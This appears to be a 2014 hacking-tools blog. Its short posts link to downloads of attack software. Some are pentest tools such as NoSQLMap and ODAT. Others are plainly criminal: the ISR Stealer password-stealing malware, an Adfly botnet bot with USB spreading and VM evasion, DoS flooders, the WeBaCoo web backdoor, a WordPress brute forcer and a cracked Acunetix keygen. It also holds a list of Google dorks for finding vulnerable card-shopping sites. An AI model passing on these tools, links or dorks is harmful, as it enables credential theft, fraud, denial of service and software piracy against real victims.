Wednesday, July 9, 2014

NoSQLMap




Introduction

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.
It is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.

Requirements

On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap's dependencies.
Varies based on features used:
  • Metasploit Framework,
  • Python with PyMongo,
  • httplib2,
  • and urllib available.
  • A local, default MongoDB instance for cloning databases to. Check here for installation instructions.
There are some various other libraries required that a normal Python installation should have readily available. Your milage may vary, check the script.

Setup

An experimental setup.sh script for Debian and Red Hat based systems is included. Any feedback or suggestions on improving this process is welcome.

Download

https://github.com/tcstool/NoSQLMap

Usage

-Start with
./nosqlmap.py
or
python nosqlmap.py.
NoSQLMap uses a menu based system for building attacks. Upon starting NoSQLMap you are presented with with the main menu:
1-Set options (do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit
Explanation of options:
1. Set target host/IP-The target web server (i.e. www.google.com) or MongoDB server you want to attack.
2. Set web app port-TCP port for the web application if a web application is the target.
3. Set URI Path-The portion of the URI containing the page name and any parameters but NOT the host name (e.g. /app/acct.php?acctid=102).
4. Set HTTP Request Method (GET/POST)-Set the request method to a GET or POST; Presently only GET is implemented but working on implementing POST requests exported from Burp. 
5. Set my local Mongo/Shell IP-Set this option if attacking a MongoDB instance directly to the IP of a target Mongo installation to clone victim databases to or open Meterpreter shells to.
6. Set shell listener port-If opening Meterpreter shells, specify the port.
7. Load options file-Load a previously saved set of settings for 1-6.
8. Load options from saved Burp request-Parse a request saved from Burp Suite and populate the web application options.
9. Save options file-Save settings 1-6 for future use.
x. Back to main menu-Use this once the options are set to start your attacks.
Posted by at No comments:

GoldenEye Layer 7

GoldenEye GoldenEye is a HTTP/S Layer 7 Denial-of-Service Testing Tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets on the HTTP/S server.

This project started by the influence of Barry Shteiman who created HULK, a Proof-of-concept tool that I decided to improve which later became GoldenEye.

This software is written in purely Python.

* Some users reports that GoldenEye is also running 100% stable on Mac’s and Windows’s python.

Usage
==================================
USAGE: ./goldeneye.py <url> [OPTIONS]

OPTIONS:
========================================
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help
Utilities
==================================================
util/getuas.py – Fetchs user-agent lists from http://www.useragentstring.com/pages...gentstring.php subpages (ex: ./getuas.py http://www.useragentstring.com/pages/Browserlist/) REQUIRES BEAUTIFULSOUP4
res/lists/useragents – Text lists (one per line) of User-Agent strings (from http://www.useragentstring.com)

Changelog
=====================================================
2014-02-20 Added randomly created user agents (still RFC compliant).
2014-02-19 Removed silly referers and user agents. Improved randomness of referers. Added external user-agent list support.
2013-03-26 Changed from threading to multiprocessing. Still has some bugs to resolve like I still don't know how to propperly shutdown the manager.
2012-12-09 Initial release


Download:
==============================
https://github.com/jseidl/GoldenEye

LEGAL NOTICE
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY! IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.
Posted by at No comments:
PyHttpShell is a proof of concept and has very simple and basic features, it was written in Python 2.7 and php.


Features
#######################################
Transport over HTTP/HTTPS.
Supports System Proxy Settings.
Multiple Hosts/Connections.
Download files to client machine.
Change Sleep time remotely.
Works on Win/MAC/Linux

Source
#############################
http://sourceforge.net/projects/pyhttpshell/
Posted by at No comments:

NetStress-NG DDOS


Description
###########################################
Syn Flood Attacks
==============================
SYNFlood with static source port
SYNFlood with random source port
SYNFlood with static source ip address
SYNFlood with random source address
SynFlood with fragmented packets

ACK Flood Attacks
===============================
ACK Flood with static source port
ACK Flood with random source port
ACK Flood with static source ip address
ACK Flood with random source address
ACK Flood with fragmented packets

FIN Flood Attacks
===============================
FIN Flood with static source port
FIN Flood with random source port
FIN Flood with static source ip address
FIN Flood with random source address
FIN Flood with fragmented packets

UDP Flood Attacs
===============================
Static source port udp flood
UDP flood with random source port
UDP Flood with static source ip address
UDP Flood with random source address
UDP Flood with fragmented packets

ICMP Flood
========================================
ICMP Flood with all options random(source ip, icmp type, code)
HTTP Flood

Source
###################################
http://sourceforge.net/projects/netstressng/
Posted by at No comments:

Assassin V1.0 - BurpSuite Plugin

Assassin V1.0 - BurpSuite Plugin
###################################################
This gadget is currently only two functions, one is a side note, the other is a subdomain brute.

Looks like China has not written Burp widget seen someone sent over, it could have been written as early as in others secretly used.

This tool, after a lot of information will increase the detection function. For example, Web fingerprint identification, port detection, vulnerability automation use.

Assassin shown below:


Download
#####################
https://www.dropbox.com/s/oxfjj4eqwblj7yn/BurpSuite%20AssassinV1.0.rar
Posted by at No comments:

Heartbeat Scanner (Exploit CVE-2014-0160) [Python]

Script on the python
Scans the vulnerability Exploit CVE-2014-0160

Download
##################################
http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip
Posted by at No comments:
WebPwn3r


Descripción:
###########################################
WebPwn3r - Web Applications Security Scanner.

In it’s Public Demo version, WebPwn3r got below Features:

1- Scan a URL or List of URL’s
2- Detect and Exploit Remote Code Injection Vulnerabilities.
3- ~ ~ ~ Remote Command Execution Vulnerabilities.
4- ~ ~ ~ Typical XSS Vulnerabilities.
5- Detect WebKnight WAF.
6- Improved Payloads to bypass Security Filters/WAF’s.
7- Finger-Print the backend Technologies.

WebPwn3r:
###############################
https://github.com/zigoo0/webpwn3r

Video: Yahoo! RCE Detector WebPwn3r
######################################
https://www.youtube.com/embed/B6kDUk-ehOE?wmode=opaque

Posted by at No comments:

Bypass Adfly by Metal

Bypass Adfly by Metal 

Download
#########################
http://www.datafilehost.com/d/68ca9006
Posted by at 2 comments:

Social-Engineer Toolkit (SET) v6.0 Pre-Release Training

Social-Engineer Toolkit (SET) v6.0 Pre-Release Training
##############################################
Free Webinar: Social-Engineer Toolkit (SET) v6.0 Pre-Release Training



TrustedSec is hosting a free pre-release webinar / training session to discuss the features of the upcoming major release of The Social-Engineer Toolkit (SET) v6.0 Codename: Rebellion. This new version has a number of enhancements, new exploits, attack vectors, and much more. The final version of SET v6.0 will be released on May 17th, 2014 at BSIDES Cincinnati however, get a sneak peak as well as the different attack vectors and best how to utilize SET in this webinar.

* info
The webinar will be provided through David Kennedy, the creator of SET and CEO of TrustedSec. The following areas will be discussed:

* New features in SET
* How to best use the new features
* How to utilize SET for different attack vectors
* Walkthrough of the different features both old and new and how to best apply them for a successful SE

The webinar is FREE and open to the public. Note that we expect this to go quick. Register now for the free webinar below:

Source
##########################
https://www.trustedsec.com/may-2014/free-webinar-social-engineer-toolkit-set-v6-0-pre-release-training/
Posted by at No comments:

Minisplo1t v.2 Final RELEASE

Minisplo1t v.2 Final RELEASE


How to :
#######################################
Download the file by clicking the download button below

save in root Directory

Extract file :

tar -xvf Minisploi-v2-Final.tar
change file permission:

chmod +x Minisploit-Final/minisplo1t.sh
starting the Minisploit

cd Minisploit-Final/
./minisplo1t.sh
Download
#################
http://sourceforge.net/projects/hidemichi/files/latest/download?source=files
Posted by at No comments:

HQLmap

HQLmap
################
This project has been created to exploit HQL Injections. The tool has been written in Python and is released under MIT License. Future development : I have in mind to develop specific module for SQLmap.

Source
################
https://github.com/PaulSec/HQLmap
Posted by at No comments:

Acunetix Web Vulnerability Scanner (WVS v9.5) with Keygen

Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

This week the latest version was released, Acunetix Vulnerability Scanner 9.5.

Features :
###################
- AcuSensor Technology
- Industry’s most advanced and in-depth SQL injection and Cross site scripting testing
- Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
- Visual macro recorder makes testing web forms and password protected areas easy
- Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
- Extensive reporting facilities including PCI compliance reports
- Multi-threaded and lightning fast scanner – processes thousands of pages with ease
- Intelligent crawler detects web server type, application language and smartphone-optimized sites.
- Acunetix crawls and analyzes different types of websites including HTML5, SOAP and AJAX
- Port scans a web server and runs security checks against network services running on the server

Download
#################
http://www.datafilehost.com/d/27bfdcdb
KeyGen
##########################
http://www.datafilehost.com/d/741bfc40
Posted by at No comments:

xSecurity WordPress Brute Force MultiThreading Python


Download
###########
http://pastebin.com/raw.php?i=4BV4Kj0a
Posted by at No comments:

WeBaCoo (Web Backdoor Cookie)

WeBaCoo (Web Backdoor Cookie)
#########################
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server.

WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.

The script-kit has two main operation modes: Generation and “Terminal”. Using generation mode, user can create the backdoor code containing the PHP payloads. On the other hand, at the remote “terminal” mode the client can connect to the compromised server where the backdoor PHP code has been injected. In order to establish the remote “pseudo”-shell, the user must provide the server’s URL path containing the injected code.


Source
###############
https://github.com/anestisb/WeBaCoo/zipball/master
Posted by at No comments:

JY Adfly Bot - The Moneymaking Bot

Make unlimited money with you botnet or other spreading methods!

Information
####################

This bot is used to making money with Adfly. All registered Adfly links are automatically called when the victims with any PC-boat in the background.

Connections to the IP address 77.66.30.215 must be blocked before use of tools! For this purpose, a firewall or the hosts file can be used.

Features
###########
Up to 6 Adfly links
USB spread
StartUp function
Icon Changer
Bypass VM & Snubis
process Killer

Download
#################
https://www.dropbox.com/s/cegiehasobrgi1m/JY_Adfly_Bot.rar
Posted by at 3 comments:

XSSYA(Cross Site Scripting Scanner & Vulnerability Confirmation)

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods)
• Method number 1 for Confirmation Request and Response
• Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded
• Support HTTPS
• After Confirmation (execute payload to get cookies)
• Identify 3 Types of WAF (Mod_Security - WebKnight - F5 BIG IP)
• Can be run in (Windows - Linux)
XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal
$ Python xssya.py
Links should end with (/or=or?)
Example
$ Python xssya.py
http://www.domain.com/ http://www.domain.com= http://www.domain.com?
The only Module need to download is colorama-0.2.7 https://pypi.python.org/pypi/colorama
Note: Crawling (need to be enhanced)
Source
#############
https://github.com/yehia-mamdouh/XSSYA
Posted by at No comments:

ODAT (Oracle Database Attacking Tool)

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that test Oracle database security remotely.
Usage examples of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)

Features
search valid SID on a remote Oracle Database listener via: a dictionary attack/a brute force attack/ALIAS of the listener
search Oracle accounts using: a dictionary attack/each Oracle user like the password
execute system commands on the database server using: DBMS_SCHEDULER/JAVA/external tables/oradbg
download files stored on the database server using: UTL_FILE/external tables/CTXSYS
upload files on the database server using: UTL_FILE/DBMS_XSLPROCESSOR/DBMS_ADVISOR
delete files using: UTL_FILE
send/reveive HTTP requests from the database server using: UTL_HTTP/HttpUriType
scan ports of the local server or a remote server using: UTL_HTTP/HttpUriType/UTL_TCP
exploit the CVE-2012-313 (CVE-2012-3137 : The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 all)
Install/Dependencies
ODAT is compatible with Linux only. A standalone version exists in order to don’t have need to install dependencies and slqplus (see the build folder of the git). The ODAT standalone has been generated thanks to pyinstaller.
If you want to have the development version installed on your computer, these following tool and dependencies are needed:
Langage: Python 2.7
Oracle dependancies: Instant Oracle basic & Instant Oracle sdk
Python libraries: cx_Oracle with the following recommended – colorlog/termcolor/argcomplete/pyinstaller

Source
###############
https://github.com/quentinhardy/odat
Posted by at No comments:
New CC SHOP Dorks 2014
##################################
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy
Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys" 

 inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy
Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys" 
Posted by at No comments:

Monday, July 7, 2014

######################################################
#ISR Stealer 0.4.1 (New Version Clean & Work 100%)
######################################################
#Made in:       Romania, Europe
#Release date:  20.08.2012
#Gfx by:        Y.xakep and Tinkode
#Credits:       Cobein, 7, Bilal Ghouri, SqUeEzEr, Rtflol and Nirsoft team.
#Beta testers : linuxgirl, zippy and wav3
#Developed for: TrojanForge.com and InSecurity.Ro

        _._._                       _._._
       _|   |_                     _|   |_
       | ... |_._._._._._._._._._._| ... |
       | ||| | o TrojanForge.com o | ||| |
        | """ |  """    """    """  | """ |
        ())  |[-|-]| [-|-]  [-|-]  [-|-] |[-|-]|  ())
 (())) |     |---------------------|     | (()))
(())())| """ |  """    """    """  | """ |(())())
(()))()|[-|-]|  :::   .-"-.   :::  |[-|-]|(()))()
         ()))(()|     | |~|~|  |_|_|  |~|~| |     |()))(()
   ||  |_____|_|_|_|__|_|_|__|_|_|_|_____|  ||
~ ~^^ @@@@@@@@@@@@@@/=======\@@@@@@@@@@@@@@ ^^~ ~
     ^~^~                                ~^~^

#Options:
+Send logs to my sql data base(php)
+Change server icon
+Steal options:
Internet Explorer (All Versions)
Mozilla Firefox (All Versions)
Google Chrome (All Versions)
Opera (All Versions)
Safari (All Versions)
VPN/Network Accounts
Yahoo Messenger 8/9/10 Password
Msn Messenger
Pidgin
Filezilla
Internet Download Manager (IDM)
jDownloader
Trillian

######################################################
#Coded by BUNNN
######################################################
Update 0.4.1
Added password recovery for:
+Outlook Express
+Microsoft Outlook 2000/2002/2003/2007/2010
+Windows Mail, windows Live Mail
+IncrediMail
+Eudora
+Netscape 6.x/7.x
+Mozilla Thunderbird
+Group Mail Free
+Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
+Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
+Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
======================================================
How To Set Up ISR Stealer
################
Download Links
======================
Mediafire Link
===========
https://www.mediafire.com/?78bmbmmxcm7o02e

Dropbox Download Link
===================
https://www.dropbox.com/s/nfgdkp9q1t078ni/ISR%20Stealer%200.4.1.rar?

Ziddu Download Link
====================
http://downloads.ziddu.com/download/23890840/ISR-Stealer-0.4.1.rar.html
Posted by at No comments:
Subscribe to: Posts (Atom)